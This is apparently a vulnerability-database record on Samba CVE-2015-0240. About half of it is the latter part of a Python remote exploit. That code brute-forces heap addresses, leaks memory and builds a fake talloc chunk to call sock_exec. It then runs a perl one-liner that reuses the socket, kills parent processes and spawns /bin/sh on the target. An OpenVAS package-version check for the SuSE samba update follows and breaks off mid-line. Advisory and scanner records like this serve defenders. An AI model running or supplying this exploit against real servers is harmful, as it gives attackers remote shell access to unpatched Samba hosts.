{:x}\".format(info['uint8t_addr']))\r\n print(\" [+] pool addr: {:x}\".format(info['pool_addr']))\r\n \r\n return True\r\n \r\ndef leak_sock_fd(info):\r\n # leak sock fd from\r\n # smb_request->sconn->sock\r\n # (offset: ->0x3c ->0x0 )\r\n print(\"[*] leaking socket fd ...\")\r\n info['smb_request_addr'] = info['pool_addr']+0x11a0\r\n print(\" [*] smb request addr: {:x}\".format(info['smb_request_addr']))\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr']+0x3c-4)\r\n if answers is None:\r\n print(' [-] cannot leak sconn_addr address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n sconn_addr = answers[2]\r\n info['sconn_addr'] = sconn_addr\r\n print(' [+] sconn addr: {:x}'.format(sconn_addr))\r\n \r\n # write in padding of chunk, no need to disconnect\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], sconn_addr)\r\n if answers is None:\r\n print('cannot leak sock_fd address :(')\r\n return None\r\n sock_fd = answers[1]\r\n print(' [+] sock fd: {:d}'.format(sock_fd))\r\n info['sock_fd'] = sock_fd\r\n return sock_fd\r\n \r\ndef leak_talloc_pop_addr(info):\r\n # leak destructor talloc_pop() address\r\n # overwrite name field, no need to disconnect\r\n print('[*] leaking talloc_pop address')\r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], info['pool_addr'] + 0x14)\r\n if answers is None:\r\n print(' [-] cannot leak talloc_pop() address :(')\r\n return None\r\n if answers[2] != 0x2010: # chunk size must be 0x2010\r\n print(' [-] cannot leak talloc_pop() address. answers[2] is wrong :(')\r\n return None\r\n talloc_pop_addr = answers[0]\r\n print(' [+] talloc_pop addr: {:x}'.format(talloc_pop_addr))\r\n info['talloc_pop_addr'] = talloc_pop_addr\r\n return talloc_pop_addr\r\n \r\ndef leak_smbd_server_connection_handler_addr(info):\r\n # leak address from\r\n # smbd_server_connection.smb1->fde ->handler\r\n # (offset: ->0x9c->0x14 )\r\n # MUST NOT disconnect after getting smb1_fd_event address\r\n print('[*] leaking smbd_server_connection_handler address')\r\n def real_leak_conn_handler_addr(info):\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['sconn_addr'] + 0x9c)\r\n if answers is None:\r\n print(' [-] cannot leak smb1_fd_event address :(')\r\n return None\r\n smb1_fd_event_addr = answers[1]\r\n print(' [*] smb1_fd_event addr: {:x}'.format(smb1_fd_event_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], smb1_fd_event_addr+0x14)\r\n if answers is None:\r\n print(' [-] cannot leak smbd_server_connection_handler address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n smbd_server_connection_handler_addr = answers[0]\r\n diff = info['talloc_pop_addr'] - smbd_server_connection_handler_addr\r\n if diff > 0x2000000 or diff < 0:\r\n print(' [-] get wrong smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n smbd_server_connection_handler_addr = None\r\n return smbd_server_connection_handler_addr\r\n \r\n smbd_server_connection_handler_addr = None\r\n while smbd_server_connection_handler_addr is None:\r\n smbd_server_connection_handler_addr = real_leak_conn_handler_addr(info)\r\n \r\n print(' [+] smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n info['smbd_server_connection_handler_addr'] = smbd_server_connection_handler_addr\r\n \r\n return smbd_server_connection_handler_addr\r\n \r\ndef find_smbd_base_addr(info):\r\n # estimate smbd_addr from talloc_pop\r\n if (info['talloc_pop_addr'] & 0xf) != 0 or (info['smbd_server_connection_handler_addr'] & 0xf) != 0:\r\n # code has no alignment\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x124000\r\n else:\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x130000\r\n start_addr = start_addr & 0xfffff000\r\n stop_addr = start_addr - 0x20000\r\n \r\n print('[*] finding smbd loaded addr ...')\r\n while True:\r\n smbd_addr = start_addr\r\n while smbd_addr >= stop_addr:\r\n if addr2utf_prefix(smbd_addr-8) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n test_addr = smbd_addr - 0x800 - 4\r\n else:\r\n test_addr = smbd_addr - 8\r\n # test writable on test_addr\r\n answers = leak_info_addr(info['payload_addr'], 0, test_addr, retry=False)\r\n if answers is not None:\r\n break\r\n smbd_addr -= 0x1000 # try prev page\r\n if smbd_addr > stop_addr:\r\n break\r\n print(' [-] failed. try again.')\r\n \r\n info['smbd_addr'] = smbd_addr\r\n print(' [+] found smbd loaded addr: {:x}'.format(smbd_addr))\r\n \r\ndef dump_mem_call_addr(info, target_addr):\r\n # leak pipes_struct address from\r\n # smbd_server_connection->chain_fsp->fake_file_handle->private_data\r\n # (offset: ->0x48 ->0xd4 ->0x4 )\r\n # Note:\r\n # - MUST NOT disconnect because chain_fsp,fake_file_handle,pipes_struct address will be changed\r\n # - target_addr will be replaced with current_pdu_sent address\r\n # check read_from_internal_pipe() in source3/rpc_server/srv_pipe_hnd.c\r\n print(' [*] overwrite current_pdu_sent for dumping memory ...')\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr'] + 0x48)\r\n if answers is None:\r\n print(' [-] cannot leak chain_fsp address :(')\r\n return False\r\n chain_fsp_addr = answers[1]\r\n print(' [*] chain_fsp addr: {:x}'.format(chain_fsp_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], chain_fsp_addr+0xd4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak fake_file_handle address :(')\r\n return False\r\n fake_file_handle_addr = answers[0]\r\n print(' [*] fake_file_handle addr: {:x}'.format(fake_file_handle_addr))\r\n \r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], fake_file_handle_addr+0x4-0x4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak pipes_struct address :(')\r\n return False\r\n pipes_struct_addr = answers[2]\r\n print(' [*] pipes_struct addr: {:x}'.format(pipes_struct_addr))\r\n \r\n current_pdu_sent_addr = pipes_struct_addr+0x84\r\n print(' [*] current_pdu_sent addr: {:x}'.format(current_pdu_sent_addr))\r\n # change pipes->out_data.current_pdu_sent to dump memory\r\n return leak_info_unlink(info['payload_addr'], current_pdu_sent_addr-4, target_addr, call_only=True)\r\n \r\ndef dump_smbd_find_bininfo(info):\r\n def recv_till_string(data, s):\r\n pos = len(data)\r\n while True:\r\n data += force_recv()\r\n if len(data) == pos:\r\n print('no more data !!!')\r\n return None\r\n p = data.find(s, pos-len(s))\r\n if p != -1:\r\n return (data, p)\r\n pos = len(data)\r\n return None\r\n \r\n def lookup_dynsym(dynsym, name_offset):\r\n addr = 0\r\n i = 0\r\n offset_str = pack(\"<I\", name_offset)\r\n while i < len(dynsym):\r\n if dynsym[i:i+4] == offset_str:\r\n addr = unpack(\"<I\", dynsym[i+4:i+8])[0]\r\n break\r\n i += 16\r\n return addr\r\n \r\n print('[*] dumping smbd ...')\r\n dump_call = False\r\n # have to minus from smbd_addr because code section is read-only\r\n if addr2utf_prefix(info['smbd_addr']-4) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n dump_addr = info['smbd_addr'] - 0x800 - 4\r\n else:\r\n dump_addr = info['smbd_addr'] - 4\r\n for i in range(8):\r\n if dump_mem_call_addr(info, dump_addr):\r\n mem = force_recv()\r\n if len(mem) == 4280:\r\n dump_call = True\r\n break\r\n print(' [-] dump_mem_call_addr failed. try again')\r\n force_dce_disconnect()\r\n if not dump_call:\r\n print(' [-] dump smbd failed')\r\n return False\r\n \r\n print(' [+] dump success. getting smbd ...')\r\n # first time, remove any data before \\7fELF\r\n mem = mem[mem.index('\\x7fELF'):]\r\n \r\n mem, pos = recv_till_string(mem, '\\x00__gmon_start__\\x00')\r\n print(' [*] found __gmon_start__ at {:x}'.format(pos+1))\r\n \r\n pos = mem.rfind('\\x00\\x00', 0, pos-1)\r\n dynstr_offset = pos+1\r\n print(' [*] found .dynstr section at {:x}'.format(dynstr_offset))\r\n \r\n dynstr = mem[dynstr_offset:]\r\n mem = mem[:dynstr_offset]\r\n \r\n # find start of .dynsym section\r\n pos = len(mem) - 16\r\n while pos > 0:\r\n if mem[pos:pos+16] == '\\x00'*16:\r\n break\r\n pos -= 16 # sym entry size is 16 bytes\r\n if pos <= 0:\r\n print(' [-] found wrong .dynsym section at {:x}'.format(pos))\r\n return None\r\n dynsym_offset = pos\r\n print(' [*] found .dynsym section at {:x}'.format(dynsym_offset))\r\n dynsym = mem[dynsym_offset:]\r\n \r\n # find sock_exec\r\n dynstr, pos = recv_till_string(dynstr, '\\x00sock_exec\\x00')\r\n print(' [*] found sock_exec string at {:x}'.format(pos+1))\r\n sock_exec_offset = lookup_dynsym(dynsym, pos+1)\r\n print(' [*] sock_exec offset {:x}'.format(sock_exec_offset))\r\n \r\n #info['mem'] = mem # smbd data before .dynsym section\r\n info['dynsym'] = dynsym\r\n info['dynstr'] = dynstr # incomplete section\r\n info['sock_exec_addr'] = info['smbd_addr']+sock_exec_offset\r\n print(' [+] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n \r\n # Note: can continuing memory dump to find ROP\r\n \r\n force_dce_disconnect()\r\n \r\n########\r\n# code execution\r\n########\r\ndef call_sock_exec(info):\r\n prefix_len = addr2utf_prefix(info['sock_exec_addr'])\r\n if prefix_len == 3:\r\n return False # too bad... cannot call\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n fake_talloc_chunk_exec = pack(\"<IIIIIIIIIIII\",\r\n 0, 0, # next, prev\r\n 0, 0, # parent, child\r\n 0, # refs\r\n info['sock_exec_addr'], # destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n chunk = '\\x00'*prefix_len+fake_talloc_chunk_exec + info['cmd'] + '\\x00'\r\n set_payload(chunk, TARGET_PAYLOAD_SIZE)\r\n for i in range(3):\r\n if request_check_valid_addr(info['payload_addr']+TALLOC_HDR_SIZE+prefix_len):\r\n print('waiting for shell :)')\r\n return True\r\n print('something wrong :(')\r\n return False\r\n \r\n########\r\n# start work\r\n########\r\n \r\ndef check_exploitable():\r\n if request_check_valid_addr(0x41414141):\r\n print('[-] seems not vulnerable')\r\n return False\r\n if request_check_valid_addr(0):\r\n print('[+] seems exploitable :)')\r\n return True\r\n \r\n print(\"[-] seems vulnerable but I cannot exploit\")\r\n print(\"[-] I can exploit only if 'creds' is controlled by 'ReferentId'\")\r\n return False\r\n \r\ndef do_work(args):\r\n info = {}\r\n \r\n if not (args.payload_addr or args.heap_start or args.start_payload_size):\r\n if not check_exploitable():\r\n return\r\n \r\n start_size = 512*1024 # default size with 512KB\r\n if args.payload_addr:\r\n info['payload_addr'] = args.payload_addr\r\n else:\r\n heap_start = args.heap_start if args.heap_start else 0xb9800000+0x30000\r\n if args.start_payload_size:\r\n start_size = args.start_payload_size * 1024\r\n if start_size < TARGET_PAYLOAD_SIZE:\r\n start_size = 512*1024 # back to default\r\n info['payload_addr'] = find_payload_addr(heap_start, start_size, TARGET_PAYLOAD_SIZE)\r\n \r\n # the real talloc chunk address that stored the raw netlogon data\r\n # serverHandle 0x10 bytes. accountName 0xc bytes\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n \r\n while not leak_info_find_offset(info):\r\n # Note: do heap bruteforcing again seems to be more effective\r\n # start from payload_addr + some offset\r\n print(\"[+] bruteforcing heap again. start from {:x}\".format(info['payload_addr']+0x10000))\r\n info['payload_addr'] = find_payload_addr(info['payload_addr']+0x10000, start_size, TARGET_PAYLOAD_SIZE)\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n \r\n got_fd = leak_sock_fd(info)\r\n \r\n # create shell command for reuse sock fd\r\n cmd = \"perl -e 'use POSIX qw(dup2);$)=0;$>=0;\" # seteuid, setegid\r\n cmd += \"dup2({0:d},0);dup2({0:d},1);dup2({0:d},2);\".format(info['sock_fd']) # dup sock\r\n # have to kill grand-grand-parent process because sock_exec() does fork() then system()\r\n # the smbd process still receiving data from socket\r\n cmd += \"$z=getppid;$y=`ps -o ppid= $z`;$x=`ps -o ppid= $y`;kill 15,$x,$y,$z;\" # kill parents\r\n cmd += \"\"\"print \"shell ready\\n\";exec \"/bin/sh\";'\"\"\" # spawn shell\r\n info['cmd'] = cmd\r\n \r\n # Note: cannot use system@plt because binary is PIE and chunk dtor is called in libtalloc.\r\n # the ebx is not correct for resolving the system address\r\n smbd_info = {\r\n 0x5dd: { 'uint8t_offset': 0x711555, 'talloc_pop': 0x41a890, 'sock_exec': 0x0044a060, 'version': '3.6.3-2ubuntu2 - 3.6.3-2ubuntu2.3'},\r\n 0xb7d: { 'uint8t_offset': 0x711b7d, 'talloc_pop': 0x41ab80, 'sock_exec': 0x0044a380, 'version': '3.6.3-2ubuntu2.9'},\r\n 0xf7d: { 'uint8t_offset': 0x710f7d, 'talloc_pop': 0x419f80, 'sock_exec': 0x00449770, 'version': '3.6.3-2ubuntu2.11'},\r\n 0xf1d: { 'uint8t_offset': 0x71ff1d, 'talloc_pop': 0x429e80, 'sock_exec': 0x004614b0, 'version': '3.6.6-6+deb7u4'},\r\n }\r\n \r\n leak_talloc_pop_addr(info) # to double check the bininfo\r\n bininfo = smbd_info.get(info['uint8t_addr'] & 0xfff)\r\n if bininfo is not None:\r\n smbd_addr = info['uint8t_addr'] - bininfo['uint8t_offset']\r\n if smbd_addr + bininfo['talloc_pop'] == info['talloc_pop_addr']:\r\n # correct info\r\n print('[+] detect smbd version: {:s}'.format(bininfo['version']))\r\n info['smbd_addr'] = smbd_addr\r\n info['sock_exec_addr'] = smbd_addr + bininfo['sock_exec']\r\n print(' [*] smbd loaded addr: {:x}'.format(smbd_addr))\r\n print(' [*] use sock_exec offset: {:x}'.format(bininfo['sock_exec']))\r\n print(' [*] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n else:\r\n # wrong info\r\n bininfo = None\r\n \r\n got_shell = False\r\n if bininfo is None:\r\n # no target binary info. do a hard way to find them.\r\n \"\"\"\r\n leak smbd_server_connection_handler for 2 purposes\r\n - to check if compiler does code alignment\r\n - to estimate smbd loaded address\r\n - gcc always puts smbd_server_connection_handler() function at\r\n beginning area of .text section\r\n - so the difference of smbd_server_connection_handler() offset is\r\n very low for all smbd binary (compiled by gcc)\r\n \"\"\" \r\n leak_smbd_server_connection_handler_addr(info)\r\n find_smbd_base_addr(info)\r\n dump_smbd_find_bininfo(info)\r\n \r\n # code execution\r\n if 'sock_exec_addr' in info and call_sock_exec(info):\r\n s = get_socket()\r\n print(s.recv(4096)) # wait for 'shell ready' message\r\n s.send('uname -a\\n')\r\n print(s.recv(4096))\r\n s.send('id\\n')\r\n print(s.recv(4096))\r\n s.send('exit\\n')\r\n s.close()\r\n \r\n \r\ndef hex_int(x):\r\n return int(x,16)\r\n \r\n# command arguments\r\nparser = argparse.ArgumentParser(description='Samba CVE-2015-0240 exploit')\r\nparser.add_argument('target', help='target IP address')\r\nparser.add_argument('-hs', '--heap_start', type=hex_int,\r\n help='heap address in hex to start bruteforcing')\r\nparser.add_argument('-pa', '--payload_addr', type=hex_int, \r\n help='exact payload (accountName) address in heap. If this is defined, no heap bruteforcing')\r\nparser.add_argument('-sps', '--start_payload_size', type=int,\r\n help='start payload size for bruteforcing heap address in KB. (128, 256, 512, ...)')\r\n \r\nargs = parser.parse_args()\r\nrequester.set_target(args.target)\r\n \r\n \r\ntry:\r\n do_work(args)\r\nexcept KeyboardInterrupt:\r\n pass\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89724", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:36:08", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310850934", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850934", "title": "SuSE Update for samba SUSE-SU-2015:0353-1 (samba)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0353_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for samba SUSE-SU-2015:0353-1 (samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850934\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 14:40:29 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0240\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for samba SUSE-SU-2015:0353-1 (samba)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"samba was updated to fix one security issue.\n\n This security issue was fixed:\n\n - CVE-2015-0240: Don't call talloc_free on an uninitialized pointer\n (bnc#917376).\n\n These non-security issues were fixed:\n\n - Fix vfs_snapper DBus string handling (bso#11055, bnc#913238).\n\n - Fix libsmbclient DFS referral handling.\n + Reuse connections derived from DFS referrals (bso#10123).\n + Set domain/workgroup based on authentication callback value\n (bso#11059).\n\n - pam_winbind: Fix warn_pwd_expire implementation (bso#9056).\n\n - nsswitch: Fix soname of linux nss_*.so.2 modules (bso#9299).\n\n - Fix profiles tool (bso#9629).\n\n - s3-lib: Do not require a password with --use-ccache (bso#10279).\n\n - s4:dsdb/rootdse: Expand extended dn values with the AS_SYSTEM control\n (bso#10949).\n\n - s4-rpc: dnsserver: Fix enumeration of IPv4 and IPv6 addresses\n (bso#10952).\n\n - s3:smb2_server: Allow reauthentication without signing (bso#10958).\n\n - s3-smbclient: Return success if we listed the shares (bso#10960).\n\n - s3-smbstatus: Fix exit code of profile output (bso#10961).\n\n - libcli: SMB2: Pure SMB2-only negprot fix to make us behave as a Windows\n client does (bso#10966).\n\n - s3: smbd/modules: Fix *allocate* calls to follow POSIX error return\n convention (bso#10982).\n\n - Fix 'domain join' by adding 'drsuapi.DsBindInfoFallBack' attribute\n 'supported_extensions' (bso#11006).\n\n - idl:drsuapi: Manage all possible lengths of drsuapi_DsBindInfo\n (bso#11006).\n\n - winbind: Retry LogonControl RPC in ping-dc after session expiration\n (bso#11034).\n\n - yast2-samba-client should be able to specify osName and osVer on AD\n domain join (bnc#873922).\n\n - Lookup FSRVP share snums at runtime rather than storing them\n persistently (bnc#908627).\n\n - Specify soft dependency for network-online.target in Winbind systemd\n service file (bnc#889175).\n\n - Fix spoolss error response marshalling (bso#10984).\n\n - pidl/wscript: Remove --with-perl-* options revert buildtools/wafadmin/\n Tools/perl.py back to upstream state (bso#10472).\n\n - s4-dns: Add support for BIND 9.10 (bso#10620).\n\n - nmbd fails to accept '--piddir' option (bso#10711).\n\n - S3: source3/smbd/process.c::srv_send_smb() returns true on the error\n path (bso#10880).\n\n - vfs_glusterfs: Remove 'integer fd' code and store the glfs pointers\n (bso#10889).\n\n - s3-nmbd: Fix netbios name truncation (bso#10896).\n\n - spoolss: Fix handling of bad EnumJobs levels (bso#10898).\n\n - spoolss: Fix jobid in level 3 EnumJobs response (bso#10905).\n\n - s3: nmbd: Ensure NetBIOS names are only 15 characters stored\n (bso#10920).\n\n - s3:smb ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"samba on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0353_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLED12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0-32bit\", rpm:\"libdcerpc-binding0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0\", rpm:\"libdcerpc-binding0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0-debuginfo-32bit\", rpm:\"libdcerpc-binding0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc-binding0-debuginfo\", rpm:\"libdcerpc-binding0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0-32bit\", rpm:\"libdcerpc0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0\", rpm:\"libdcerpc0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0-debuginfo-32bit\", rpm:\"libdcerpc0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdcerpc0-debuginfo\", rpm:\"libdcerpc0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0-32bit\", rpm:\"libgensec0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0\", rpm:\"libgensec0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0-debuginfo-32bit\", rpm:\"libgensec0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgensec0-debuginfo\", rpm:\"libgensec0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0-32bit\", rpm:\"libndr-krb5pac0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0\", rpm:\"libndr-krb5pac0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0-debuginfo-32bit\", rpm:\"libndr-krb5pac0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-krb5pac0-debuginfo\", rpm:\"libndr-krb5pac0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0-32bit\", rpm:\"libndr-nbt0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0\", rpm:\"libndr-nbt0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0-debuginfo-32bit\", rpm:\"libndr-nbt0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-nbt0-debuginfo\", rpm:\"libndr-nbt0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0-32bit\", rpm:\"libndr-standard0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0\", rpm:\"libndr-standard0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0-debuginfo-32bit\", rpm:\"libndr-standard0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr-standard0-debuginfo\", rpm:\"libndr-standard0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0-32bit\", rpm:\"libndr0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0\", rpm:\"libndr0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0-debuginfo-32bit\", rpm:\"libndr0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libndr0-debuginfo\", rpm:\"libndr0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-32bit\", rpm:\"libnetapi0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo-32bit\", rpm:\"libnetapi0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0-32bit\", rpm:\"libpdb0-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0\", rpm:\"libpdb0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0-debuginfo-32bit\", rpm:\"libpdb0-debuginfo-32bit~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libpdb0-debuginfo\", rpm:\"libpdb0-debuginfo~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libregistry0\", rpm:\"libregistry0~4.1.12~16.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 